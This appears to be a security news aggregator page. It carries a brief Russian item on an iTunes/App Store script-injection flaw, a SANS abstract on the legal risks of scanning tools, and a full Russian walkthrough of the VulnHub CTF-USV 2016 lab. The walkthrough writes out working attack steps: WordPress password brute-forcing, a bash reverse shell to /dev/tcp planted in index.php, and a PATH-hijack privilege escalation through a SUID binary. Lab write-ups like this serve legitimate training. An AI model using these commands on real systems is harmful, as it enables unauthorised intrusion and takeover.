    Следует отметить, что новоявленная уязвимость аналогична той, которую Vulnerability Lab обнаружила, а Apple пропатчила в iTunes и App Store полтора года назад. В предыдущем случае брешь позволяла удаленно внедрять вредоносные скрипты в счета, приходящие от Apple, и успешно осуществлять перехват сессий, редирект и фишинговые атаки.

    orig: 2017-01-19 00:04:10 / https://threatpost.ru/vulnerabilities-leave-itunes-app-store-open-to-script-injection/20151/ (click post title)



    Minimizing Legal Risk When Using Cybersecurity Scanning Tools

    When cybersecurity professionals use scanning tools on the networks and devices of organizations, there can be legal risks that need to be managed by individuals and enterprises. Often, scanning tools are used to measure compliance with cybersecurity policies and laws, so they must be used with due care. There are protocols that should be followed to ensure proper use of the scanning tools to prevent interference with normal network or system operations and to ensure the accuracy of the scanning results. Several challenges will be examined in depth, such as, measuring for scanner accuracy, proper methods of obtaining written consent for scanning, and how to set up a scanning session for optimum examination of systems or networks. This paper will provide cybersecurity professionals and managers with a better understanding of how and when to use the scanning tools while minimizing the legal risk to themselves and their enterprises.

    orig: 2017-01-19 00:00:00 / https://www.sans.org/reading-room/whitepapers/legal/minimizing-legal-risk-cybersecurity-scanning-tools-37522 (click post title)



    VulnHub: USV 2016. CTF в Румынии, какие они?

    Всем доброго времени суток, в этой статье рассмотрим решение Румынского CTF-USV 2016, на тему: «Игра престолов». Скачать образ виртуальной машины можно по ссылке с VulnHub.

    Если вам интересно как проходят межвузовские CTF в Румынии, прошу под кат

    Немного о CTF
    CTF-USV 2016 was the first International Students Contest in Information Security organized in Romania by Suceava University. Security challenges creation, evaluation of results and building of CTF environment was provided by Safetech Tech Team: Oana Stoian (@gusu_oana), Teodor Lupan (@theologu) and Ionut Georgescu (@ionutge1)
    Всего имеется 7 флагов, следующего формата: Country_name Flag: [md5 hash].Начнём!
    Изучим цель nmap'ом:
    $ sudo arp-scan -l -I wlan0 | grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV -p1-65535

    Starting Nmap 7.01 (
    nmap.org ) at 2017-01-15 19:47 MSK
    Nmap scan report for 192.168.1.102
    Host is up (0.00057s latency).
    Not shown: 65529 closed ports
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.3 (protocol 2.0)
    80/tcp open http Apache httpd
    3129/tcp open http-proxy Squid http proxy 3.5.22
    3306/tcp open mysql MariaDB (unauthorized)
    4444/tcp open http Foundry EdgeIron switch http config
    21211/tcp open ftp vsftpd 2.0.8 or later
    MAC Address: 08:00:27:2B:64:55 (Oracle VirtualBox virtual NIC)
    Service Info: Host: SevenKingdoms; Device: switch
    И приступим ко взятию флагов…Flag 1 (Croatia)
    С первым флагом, всё просто. Запускаем nikto, который сразу нас информирует о наличии необычного заголовка:
    $ nikto -h 192.168.1.102

    + Uncommon header 'x-xss-protection' found, with contents: Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg==
    Декодируем его:
    $ echo Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg== | base64 -d
    Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb

    Flag 2 (Italy)

    Вот такого дракона можно увидеть при подключении по ssh. А в самом низу зашифрованную строку:

    wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB
    При внимательном осмотре, можно заметить, наличие некоторых букв, из которых состоит картинка. Сложив всё вместе получаем:
    AES ECB xxxxx0000000xxxxxx
    Алгоритм, ключ и зашифрованное сообщение у нас есть, например вот тут, расшифровываем и получаем второй флаг:

    Italy Flag: 0047449b33fbae830d833721edaef6f1

    Flag 3 (Portugal)
    Переходим к web. У нас есть сайт (80 порт), и есть прокси (3129 порт). Указав в настройках адрес и порт прокси сервера, в данном случае — атакуемой машины, открываем сайт:

    Не много, продолжим:

    Обычный WordPress, ничего примечательного. Открыв индексную страницу, попадаем в блог, с несколькими статьями об «Игре престолов». Первое, что бросается в глаза, это следующая публикация:

    Открыв это изображение, замечаем, что оно расположено в директории hodor:

    Перейдя в которую, нам предлагают скачать архив:

    В архиве нас ждёт изображение:

    И флаг:

    $ echo UG9ydHVnYWwgRmxhZzogYTI2NjNiMjMwNDVkZTU2YzdlOTZhNDA2NDI5ZjczM2Y= | base64 -d
    Portugal Flag: a2663b23045de56c7e96a406429f733f

    Flag 4 (Paraguay)
    В самом низу страницы, внимание привлекает вот такой пост:

    Парсим сайт, и собираем словарь с паролями для брутфорса:

    cewl --proxy_host 192.168.1.102 --proxy_port 3129 http://192.168.1.102/blog/ > blog.lst

    Запустив перебор, через некоторое время, patator выдаёт верный пароль:
    $ patator http_fuzz http_proxy=192.168.1.102:3129 url='http://192.168.1.102/blog/wp-login.php?action=postpass' method=POST header='Referer: "http://192.168.1.102/blog/index.php/2016/10/16/the-secret-chapter/"' body='post_password=FILE0&Submit=Enter' 0=blog.lst -x ignore:fgrep='post-password-form' follow=1 accept_cookie=1

    Вводим его и получаем доступ к содержимому этой публикации:

    Декодируем расположенную тут base64 строку и получаем новый флаг:

    $ echo UGFyYWd1YXkgRmxhZzogNDc2MWI2NWYyMDA1MzY3NDY1N2M3ZTYxODY2MjhhMjk= | base64 -d
    Paraguay Flag: 4761b65f20053674657c7e6186628a29

    Flag 5 (Thailand)
    Если верить содержимому этого поста, то пароль у нас прям перед глазами, да, картинка тут явно в тему. Но если внимательно присмотреться, то ниже есть фраза:
    She uses the Field Training Preparation for her army.
    Отлично, где авторизовываться мы знаем, остался пароль. Сначала я пробовал ввести отдельные слова, потом, добавил туда обрывки фраз, и в скором времени hydra нашла то, что нужно:

    Подключаемся:

    $ ftp 192.168.1.102 21211
    ftp> ls -ahl
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    dr-xr-xr-x    2 1000     1000         4096 Dec 05 20:05 .
    dr-xr-xr-x    2 1000     1000         4096 Dec 05 20:05 ..
    -rw-r--r--    1 0        0              94 Dec 05 20:04 .note.txt
    -rw-r--r--    1 0        0              32 Dec 05 20:05 readme.txt
    226 Directory send OK.

    Скачиваем все доступные файлы, потом будем их изучать:
    ftp> get readme.txt
    local: readme.txt remote: readme.txt
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for readme.txt (32 bytes).
    226 Transfer complete.
    32 bytes received in 0.00 secs (226.4 kB/s)
    ftp> get .note.txt
    local: .note.txt remote: .note.txt
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for .note.txt (94 bytes).
    226 Transfer complete.
    94 bytes received in 0.00 secs (791.4 kB/s)

    В первом файле ничего интересного:readme.txt

    I keep a hidden note for myself


    А вот второй достоин внимания:.note.txtI always forgot passwords, so for my blog account I used my children`s name.

    -= Daenerys =-


    Мы узнали подсказку к паролю — это имена её детей, google быстро подсказал, о каких детях идёт речь и как их зовут. Поэтому запустив crunch приступаем к генерации словаря:
    $ crunch 1 1 -p Rhaegal Viserion Drogon > dragons

    Отправляем это в wpscan для перебора:
    $ sudo ./wpscan.rb --proxy 192.168.1.102:3129 --url http://192.168.1.102/blog/ --username mother_of_dragons --wordlist dragons

    Спустя некоторое время, получаем пароль от админки WordPress. Авторизуемся, и в профиле текущего пользователя находим следующий флаг:

    $ echo VGhhaWxhbmQgRmxhZzogNmFkNzk2NWQxZTA1Y2E5OGIzZWZjNzZkYmY5ZmQ3MzM= | base64 -d
    Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733

    Flag 6 (Mongolia)
    Как оказалось, Daenerys имеет в этом блоге права администратора, так что подредактировав файл index.php, сделаем себе шелл, добавив строку:
    system('bash -i >& /dev/tcp/192.168.1.124/4444 0>&1');

    Запускаем netcat, перезагружаем страницу в браузере, и получаем шелл:

    Осмотревшись в системе, внимание привлекает файл reward_flag.txt, в директории веб-сервера:

    [http@arch blog]$ ls -ahl ../
    total 92K
    drwxr-xr-x 3 root root 4.0K Nov 17 15:43 .
    drwxr-xr-x 4 root root 4.0K May 31  2013 ..
    drwxr-xr-x 6 http http 4.0K Jan 15 19:52 blog
    -rw-r--r-- 1 root root  59K Nov 16 19:59 gtr.jpg
    -rw-r--r-- 1 root root 3.2K Nov 16 20:01 index.html
    -rw-r--r-- 1 root root   65 Nov 17 15:41 reward_flag.txt
    -rwsr-sr-x 1 root root 8.3K Nov 17 14:55 winterfell_messenger

    Откроем его, судя по всему, там должен быть флаг:
    [http@arch blog]$ cat ../reward_flag.txt
    TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=
    [http@arch blog]$ echo TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ= | base64 -d
    Mongolia Flag: 6b49c13cccd91940f09d79e142108394

    Flag 7 (Somalia)
    В директории с последним флагом лежит ещё какое-то приложение winterfell_messenger, которое судя по наличию SUID бита, вероятно поможет повысить свои привилегии в системе. Запустим его и посмотрим что оно делает:
    [http@arch http]$ ./winterfell_messenger
    cat: /root/message.txt: No such file or directory

    Так, а что на счёт строк?strings ./winterfell_messenger[http@arch http]$ strings ./winterfell_messenger
    /lib64/ld-linux-x86-64.so.2
    libc.so.6
    setuid
    system
    __libc_start_main
    __gmon_start__
    GLIBC_2.2.5
    UH-8
    AWAVA
    AUATL
    []A\A]A^A_
    cat /root/message.txt
    ;*3$"
    GCC: (GNU) 6.1.1 20160802
    GCC: (GNU) 6.2.1 20160830
    init.c
    crtstuff.c
    __JCR_LIST__
    deregister_tm_clones
    __do_global_dtors_aux
    completed.6916
    __do_global_dtors_aux_fini_array_entry
    frame_dummy
    __frame_dummy_init_array_entry
    __FRAME_END__
    __JCR_END__
    __init_array_end
    _DYNAMIC
    __init_array_start
    __GNU_EH_FRAME_HDR
    _GLOBAL_OFFSET_TABLE_
    __libc_csu_fini
    _edata
    system@@GLIBC_2.2.5
    __libc_start_main@@GLIBC_2.2.5
    __data_start
    __gmon_start__
    __dso_handle
    _IO_stdin_used
    __libc_csu_init
    __bss_start
    main
    __TMC_END__
    setuid@@GLIBC_2.2.5
    .symtab
    .strtab
    .shstrtab
    .interp
    .note.ABI-tag
    .note.gnu.build-id
    .gnu.hash
    .dynsym
    .dynstr
    .gnu.version
    .gnu.version_r
    .rela.dyn
    .rela.plt
    .init
    .text
    .fini
    .rodata
    .eh_frame_hdr
    .eh_frame
    .init_array
    .fini_array
    .jcr
    .dynamic
    .got
    .got.plt
    .data
    .bss
    .comment

    Даже реверсить не нужно, у нас есть setuid, и system, который использует относительный путь для команды cat, а из документации к system известно, что:
    system() выполняет команды, указанные в string, вызывая в свою очередь команду /bin/sh -c string, и возвращается, когда команда выполнена.
    В общем, действуем по уже знакомому алгоритму:
    [http@arch http]$ PATH=/tmp:$PATH
    [http@arch http]$ echo "/bin/bash" > /tmp/cat
    [http@arch tmp]$ chmod +x cat

    Запускаем уязвимую программу и получаем шелл:
    [http@arch tmp]$ /srv/http/winterfell_messenger
    /srv/http/winterfell_messenger
    id
    uid=0(root) gid=33(http) groups=33(http)

    В директории root находим последний флаг:
    echo U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA== | base64 -d
    Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34

    И принимаем поздравления:

    Как указано в описании, это их первый CTF. Для первого раза сойдёт, но повторять не стоит, будем надеяться они и дальше будут развивать эту тему, добавляя более изощрённые задания, ведь в реальной жизни, к сожалению, банальным сканом директорий уже никого не удивить.

    orig: 2017-01-18 22:24:09 / https://habrahabr.ru/post/319586/ (click post title)



    Далее...